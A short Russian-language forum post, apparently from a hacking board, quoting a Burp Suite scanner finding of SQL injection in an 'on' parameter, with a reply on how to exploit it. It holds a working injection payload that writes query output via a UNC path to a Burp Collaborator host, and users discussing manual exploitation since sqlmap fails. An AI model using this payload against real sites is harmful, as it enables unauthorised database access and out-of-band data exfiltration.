Показать сообщение отдельно

  #3  
Старый 02.01.2020, 16:57
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами: 11278406

Репутация: 818


По умолчанию

Цитата:
Сообщение от brown  

_on=0%20into%20outfile%20'%5c%5c%5c%5cil795b45129i xd3s13rbi2jn1e77v9j0nofb9zy.burpcollaborator.net%5 c%5caju'%3b%20--%20
n
parameter appears to be vulnerable to SQL injection attacks. The payload
into outfile '\\\\il795b45129ixd3s13rbi2jn1e77v9j0nofb9zy.burpc ollaborator.net\\aju'; --
was submitted in the on. This payload causes the database to write the results of the query to a file, and specifies a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
как крутануть такую скулю?мап не берет(
Через коллоборатор только ручками пока что. Ну или пишите софт сами, готовых реализаций пока что не видел.
 
Ответить с цитированием